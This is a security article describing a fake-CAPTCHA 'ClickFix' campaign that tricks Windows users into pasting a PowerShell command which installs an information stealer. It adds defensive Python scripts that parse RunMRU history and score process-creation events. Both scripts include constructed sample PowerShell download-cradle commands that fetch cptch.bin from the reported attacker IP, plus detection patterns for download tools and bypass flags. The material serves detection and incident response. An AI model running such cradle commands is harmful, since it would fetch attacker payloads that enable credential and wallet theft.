A newly identified malware campaign uses counterfeit CAPTCHA pages to trick users into installing an information stealer. First detected in early 2026, it resembles the ClickFix activity that targeted restaurant booking systems in mid-2025.
Social Engineering Tactics Enhanced
The operators have refined their social engineering so that the victim, not an exploit, performs the initial execution, which sidesteps defenses built around downloads. The attack begins when a user visits a compromised site that shows a fake CAPTCHA verification page. Instead of a real challenge, the page places a malicious PowerShell command on the user's clipboard and walks them through pasting it into the Windows Run dialog and pressing Enter, so the user launches the payload by hand.
This is the "ClickFix" technique: because the browser never downloads a file, controls that inspect downloads (browser download protection, web and mail gateways) have nothing to examine, and the first observable event is a PowerShell process started from the Run dialog. The pasted command downloads the next stage from attacker infrastructure at 91.92.240.219 and, according to the analysis, makes API calls to confirm the victim's actions before proceeding.
Detailed Analysis of Infection Process
Once executed, the script starts a multi-stage infection designed to harvest sensitive data. The stealer targets a broad range of applications: more than twenty-five web browsers, cryptocurrency wallets such as MetaMask, and enterprise VPN configurations. Analysts report that it checks for virtual machines and running security tools before exfiltrating anything, so a sandbox detonation may end without ever showing the data theft.
The impact is severe: with saved credentials, wallet data and VPN configurations in hand, attackers can drain accounts, sell access, or use the VPN credentials to move deeper into the corporate network.
Stealth Techniques and Persistence
Rather than dropping an executable, the loader relies on in-memory execution to stay unnoticed. After the initial PowerShell command runs, it fetches a shellcode blob named cptch.bin from the attacker's server. The shellcode was generated with the Donut framework, which packages a .NET assembly or native binary as position-independent shellcode, and it is loaded and executed directly in memory rather than launched as an executable from disk. Analysts also noted an operational-security slip: the loader script uses a variable named $finalPayload, and that string was enough for Microsoft Defender to flag the script.
The reported persistence mechanism is a modification of the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), where the pasted PowerShell command appears. One caveat applies: RunMRU is the history list of the Win+R Run dialog. Windows writes an entry there when a command is run from that dialog and does not re-execute those entries at startup, so an entry in this key is a reliable forensic trace that the ClickFix paste happened rather than an autostart location; startup re-execution would require a Run or RunOnce key, a scheduled task, or a similar mechanism. The operators also rotate payload filenames (cptchbuild.bin has been observed alongside cptch.bin), which defeats blocks keyed on the filename or URL; a renamed file keeps the same hash, so hash-based blocking only loses effectiveness when the payload content is rebuilt as well.
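Because RunMRU records what was typed into the Run dialog, it is the first artifact to pull when triaging a suspected ClickFix victim. The following Python parser is added here as an example; it is not code from the article or from the analysts. It reads the key's value layout (an MRUList ordering string plus lettered values, each ending in a literal \1), returns the history in most-recent-first order, and surfaces entries that launched an interpreter or download tool. The sample values are constructed: the ClickFix-style command reuses the article's IP and filename, but its flags and output path are assumptions, not the campaign's actual command.

```python
import re
import sys
from dataclasses import dataclass

# Where the Run dialog keeps its history (per user, so check every loaded hive).
RUNMRU_KEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Constructed sample of RunMRU values as they come back from the registry.
# "MRUList" orders the lettered values most recent first; every lettered value
# carries a literal "\1" suffix. Value "c" is a stand-in for a ClickFix paste built
# from the article's indicators (IP and filename); the -w hidden flag and the
# output path are assumptions, not the campaign's real command.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": r"notepad\1",
    "b": r"\\fileserver\share\1",
    "c": r'powershell -w hidden -c "iwr http://91.92.240.219/cptch.bin -OutFile $env:TEMP\cptch.bin"\1',
}

# Interpreters and download tools a user rarely launches from Win+R on a managed desktop.
SUSPICIOUS = re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript|cmd|curl|certutil)\b", re.I)


@dataclass
class RunEntry:
    rank: int        # 0 = most recently used
    value_name: str  # the lettered registry value the command came from
    command: str     # the command as typed, without the "\1" suffix


def parse_runmru(values):
    """Return Run dialog history in MRU order from a {value_name: data} mapping."""
    entries = []
    for rank, letter in enumerate(values.get("MRUList", "")):
        raw = values.get(letter)
        if raw is None:          # MRUList can reference a value that was deleted
            continue
        command = raw[:-2] if raw.endswith("\\1") else raw
        entries.append(RunEntry(rank, letter, command))
    return entries


def flag_runmru(values):
    """Entries that launched an interpreter or download tool: review these first."""
    return [e for e in parse_runmru(values) if SUSPICIOUS.search(e.command)]


def read_live_runmru():
    """Read the current user's RunMRU with winreg (Windows only); {} if the key is absent."""
    import winreg
    values = {}
    try:
        key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU_KEY)
    except FileNotFoundError:    # a fresh profile has never used the Run dialog
        return values
    with key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:      # raised once the index runs past the last value
                break
            values[name] = data
            index += 1
    return values


if __name__ == "__main__":
    source = read_live_runmru() if sys.platform == "win32" else SAMPLE_RUNMRU
    for entry in parse_runmru(source):
        marker = "!!" if SUSPICIOUS.search(entry.command) else "  "
        print(f"{marker} [{entry.rank}] {entry.value_name}: {entry.command}")
```

On a live Windows host the script reads the current user's hive; for an offline image, load the NTUSER.DAT hive with your registry tool of choice and feed the value mapping to parse_runmru. Remember the caveat above: an entry here proves the paste happened, not that the command survives a reboot.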
Organizations should teach users never to paste commands offered by a web page into the Run dialog or a terminal, whatever the page claims they are fixing or verifying. Security teams should monitor for the process chain this technique produces: explorer.exe (which hosts the Run dialog) spawning powershell.exe or pwsh.exe with a download cradle or encoded command on its command line, ideally correlated with PowerShell script block logging (event ID 4104) and with new entries under the user's RunMRU key. Endpoint rules that pair a browser writing to the clipboard with a PowerShell launch a few seconds later can catch the paste step itself, and network controls should block the reported infrastructure at 91.92.240.219.
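A concrete form of the PowerShell monitoring recommended above, and of the explorer.exe-to-PowerShell chain the fake CAPTCHA page produces, as an added example rather than anything published with the campaign analysis: the script scores Sysmon-style process-creation records by parent process, download-cradle idioms, window-hiding and policy-bypass flags, and the article's indicators. The sample events are constructed; the command flags and download path in the ClickFix event are assumptions.

```python
import json
import re
import sys

# Interpreters that the Run dialog (hosted by explorer.exe) hands pasted text to.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Download-and-run idioms seen in pasted ClickFix commands.
CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|"
    r"invoke-expression|\biex\b|frombase64string|\s-e(nc|ncodedcommand)?\s|\bcurl\b|\bwget\b)",
    re.I,
)
# Flags that hide the window or disable policy; interactive use rarely needs them.
HIDING = re.compile(r"(-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass)", re.I)
# Indicators taken from the article; extend from your own intel.
CAMPAIGN_IOCS = ("91.92.240.219", "cptch.bin", "cptchbuild.bin")

SEVERITY_RANK = {"none": 0, "low": 1, "medium": 2, "high": 3}

# Constructed Sysmon-style process-creation records (event ID 1 fields). Event 0 is a
# ClickFix paste modelled on the article's indicators (flags and output path are
# assumptions); the others are benign or near-miss cases to show the scoring.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr http://91.92.240.219/cptch.bin -OutFile $env:TEMP\\cptch.bin"'},
    {"Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.0\WindowsTerminal.exe",
     "CommandLine": r"pwsh -File C:\ops\rotate-logs.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell -nop -w hidden -enc aQBlAHgA"},
]


def _basename(path):
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def classify(event):
    """Return (severity, reasons) for one process-creation record."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    from_run_dialog = image in INTERPRETERS and parent == "explorer.exe"
    if from_run_dialog:
        reasons.append("interpreter spawned by explorer.exe (Run dialog paste)")
    cradle = bool(CRADLE.search(cmd))
    if cradle:
        reasons.append("download/execution cradle in command line")
    if HIDING.search(cmd):
        reasons.append("hidden window or execution-policy bypass flags")
    iocs = [i for i in CAMPAIGN_IOCS if i.lower() in cmd.lower()]
    if iocs:
        reasons.append("campaign indicator: " + ", ".join(iocs))
    # A known IOC, or the exact ClickFix shape (Run dialog + cradle), is high on its own.
    if iocs or (from_run_dialog and cradle):
        return "high", reasons
    if cradle or len(reasons) >= 2:
        return "medium", reasons
    if reasons:
        return "low", reasons
    return "none", reasons


def hunt(events, min_severity="medium"):
    """Events at or above min_severity, each with its index, severity and reasons."""
    floor = SEVERITY_RANK[min_severity]
    hits = []
    for index, event in enumerate(events):
        severity, reasons = classify(event)
        if SEVERITY_RANK[severity] >= floor:
            hits.append({"index": index, "severity": severity, "reasons": reasons,
                         "command": event.get("CommandLine", "")})
    return hits


def load_jsonl(path):
    """One JSON object per line, e.g. an export of Sysmon event ID 1 records."""
    with open(path, encoding="utf-8") as fh:
        return [json.loads(line) for line in fh if line.strip()]


if __name__ == "__main__":
    events = load_jsonl(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_EVENTS
    for hit in hunt(events, "low"):
        print(f"[{hit['severity']}] #{hit['index']} {hit['command']}")
        for reason in hit["reasons"]:
            print("    -", reason)
```

The scoring deliberately keeps "powershell launched from the Run dialog with nothing else" at low severity, since administrators do that; the combination with a cradle is what makes the ClickFix shape unambiguous. In Sysmon's own output the fields are named as above; for Windows event 4688 map NewProcessName, ParentProcessName and CommandLine (command-line auditing must be enabled) before calling classify.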
